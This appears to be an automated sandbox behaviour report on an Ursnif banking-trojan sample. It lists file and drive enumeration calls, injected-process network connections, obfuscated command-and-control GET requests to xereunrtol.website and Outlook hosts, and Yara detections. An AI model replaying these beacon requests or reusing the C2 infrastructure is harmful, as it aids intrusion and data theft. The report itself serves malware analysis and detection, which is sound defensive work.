Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B66467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	0_2_00B66467
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B5BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	0_2_00B5BAF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0334BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	3_2_0334BAF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_03356467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	3_2_03356467
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0335B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	3_2_0335B4A5

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00B52E19 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

0_2_00B52E19

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 52.97.178.98 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 193.29.104.83 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 40.101.9.178 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 40.97.160.2 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: xereunrtol.website
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: zereunrtol.website

Uses ping.exe to check the status of other devices and networks

Show sources

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: global traffic	HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
Source: global traffic	HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
Source: global traffic	HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
Source: global traffic	HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
Source: global traffic	HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
Source: global traffic	HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
Source: global traffic	HTTP traffic detected: GET /pojol/JmNBTBOVOmz/MCpw56fik9t8Vy/ZlQ_2Fs0E_2BRi348G3ku/O4RYCcTkUHQqAEFn/ZLb4Oh70tUCJDi9/F36D_2BugWGC8OKj9V/fwXX1v0UR/M9E1r1EzxpRDCLMCcbeY/A_2B3uz4RwPntF_2BuP/Ki1_2FmNFhEPNS0hSUpVht/r0S2LnMb23MIW/ncpGMbXY/o8_2B1xBC/F_2Bxvm0VV/ikN.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic	HTTP traffic detected: GET /pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic	HTTP traffic detected: GET /pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic	HTTP traffic detected: GET /pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic	HTTP traffic detected: GET /pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic	HTTP traffic detected: GET /pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 973402f4-6725-3934-5235-dbb411665df2Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DB3PR08CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DB3PR08CA0032.EURPRD08.PROD.OUTLOOK.COMX-CalculatedBETarget: DB8P193MB0645.EURP193.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: 9AI0lyVnNDlSNdu0EWZd8g.1.1X-FEServer: DB3PR08CA0032X-Powered-By: ASP.NETX-FEServer: AM6P193CA0099Date: Fri, 08 Oct 2021 04:45:27 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 407db856-2e34-d9a0-a01d-7a34e5abaa03Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: DB6P195CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: DB6P195CA0005.EURP195.PROD.OUTLOOK.COMX-CalculatedBETarget: DBBPR04MB6234.EURPRD04.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: Vrh9QDQuoNmgHXo05auqAw.1.1X-FEServer: DB6P195CA0005X-Powered-By: ASP.NETX-FEServer: AM7PR04CA0006Date: Fri, 08 Oct 2021 04:45:32 GMTConnection: close

Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000017.00000003.757597977.0000026CBE674000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.689152229.0000000006448000.00000004.00000040.sdmp, explorer.exe, 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000031.00000002.822485950.000001B91FF02000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000017.00000002.761980707.0000026CA6311000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.770495881.0000029700001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001B.00000002.771001840.0000029700209000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.811226428.0000026CB6371000.00000004.00000001.sdmp, powershell.exe, 0000001B.00000002.815218185.0000029710062000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown

DNS traffic detected: queries for: outlook.com

Source: global traffic	HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
Source: global traffic	HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
Source: global traffic	HTTP traffic detected: GET /pojol/tCbStZih9zBgw/PK5_2Fka/RdFSp7I7gIKF19Vo1xqIyOu/SHII9uTh4N/i16rSjNs5tk21XBNr/NN0e7MSF4abs/8Os7EFjy2AT/q_2FOByNu3Pktw/XcuCHxUTtQcQX6H9c5T92/Qi_2FpIg3IGciw_2/F7QY5uWmpwUhM_2/FrlZq3Dbrg_2F9dk41/aJHeuYWTN/Hb_2BgqqgGBMS_2FKc/A3Y.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
Source: global traffic	HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
Source: global traffic	HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
Source: global traffic	HTTP traffic detected: GET /pojol/xkXyR8LKA/eI1evutWYClFQ4W7hwct/llxVsyUgZqM6TRxf7bd/2z3_2BxCgTSZ4eiQRk7_2B/xhR9ASIByVYd5/k9IZWWUd/sbd5P5Eg3X7dqsFpKCJyTDt/IAd_2BtulH/3wtBmsW6X6ginLnLB/VmVEduvxIp7D/zWV8_2BxG6O/L9p9ON1U8Ev0PL/rZEhbsLNtjIw0seImBfEo/iFBYVWe9s_2F7XNI/16GpD45T/z.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
Source: global traffic	HTTP traffic detected: GET /pojol/JmNBTBOVOmz/MCpw56fik9t8Vy/ZlQ_2Fs0E_2BRi348G3ku/O4RYCcTkUHQqAEFn/ZLb4Oh70tUCJDi9/F36D_2BugWGC8OKj9V/fwXX1v0UR/M9E1r1EzxpRDCLMCcbeY/A_2B3uz4RwPntF_2BuP/Ki1_2FmNFhEPNS0hSUpVht/r0S2LnMb23MIW/ncpGMbXY/o8_2B1xBC/F_2Bxvm0VV/ikN.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic	HTTP traffic detected: GET /pojol/ad8SMO3QEV/WpK2KWVlzISPCUWri/sHIqFx0L8nEL/d6DW60Wq7Sc/nktLUA8MXJku9L/Zmk6jUfJynHeMmB_2FY4b/Civyvu50LYW7nG6R/vXmd0MgFzqo2GgW/fQxwYw_2BGvLQBdwxJ/0lhkdnAJr/xh_2Fs6N3R0PcVVrZUsT/V_2FUDCTlH6Z32G0s2B/iaQ6r5gLvcevP7/0Gv8.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic	HTTP traffic detected: GET /pojol/pfDJgBAB44HEkaaE/IAkYjQDoenC7dCc/knaeZ_2Bc4niJWZDoT/92La9yVP8/Nm_2F8vIouJQNUgCe_2B/Wv7KOG1Nz3mjOa0l_2F/OnBpy4GwhZX8qV0mLK2Wlc/FREIwqk_2Fjl_/2BOUAmEa/t8HTP1o0pL0qYjqL1hIxYFo/1EnpJwv2G5/SCJcrEDAQ0UY_2FXk/piB_2BjH/Biqze_2FNrj/O.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic	HTTP traffic detected: GET /pojol/W4QiDRChG_/2BVblDFptU_2BRt86/bDQ28Atm7UJp/hMrJ18dixaJ/Ehvso7jB6b1A7n/fuEtfFyRY6z_2FVw8s1t6/enfrMlaYNyygktry/YNTHSHxjijP0_2B/G7FZq6LMuf5Bf2R30l/ih28AE5GN/brwux6ZnrceibZm2b3Bl/W4v_2BEcLNfhDC9uqG8/mC3B1bUhAB/QJIQRA6ic/2.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic	HTTP traffic detected: GET /pojol/Erqz_2Bjz7wow49Bn/_2FYIkv6TVHF/sf1rwNiJ2Y3/yJrhJeNnU2kEjh/nuALEqJJJFMSq4HklSS5m/2rTPjjO5rg9u1lJM/jSBd70o6b_2FFTD/X_2BcSxW23GpW45bdz/qP6WaBi3l/T0VhC50JfgPQOKEf4_2B/z0gbHb1bA3R_2Bj9ls7/dy0ZwparSRsDS8LsskC3_2/FFWZkjDnU/Jgk.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website
Source: global traffic	HTTP traffic detected: GET /pojol/Iy4aVVVv_2F5p3ISq/KmA4kE4MsjC2/O0neobTDOGW/zQHPZSL_2FkiUS/WZkQDHN_2BO0wsYuYQ60c/ykD9m58yrwFA_2Fc/7Q0DjKK2XYcw7wO/NMi_2BPmiK_2FGgoaB/sAJyJXEyx/kvg73rm0ZZUQwsWRe8jH/1VJfDP67eM6_2FlNyHx/2gb4jMnS4FBhM1k7othvDH/rOcbuo_2B/liSzQ.jop HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: xereunrtol.website

Source: unknown	HTTPS traffic detected: 40.97.156.114:443 -> 192.168.2.3:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.98.208.114:443 -> 192.168.2.3:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.97.151.18:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.97.160.2:443 -> 192.168.2.3:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.97.178.98:443 -> 192.168.2.3:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.29.104.83:443 -> 192.168.2.3:49833 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
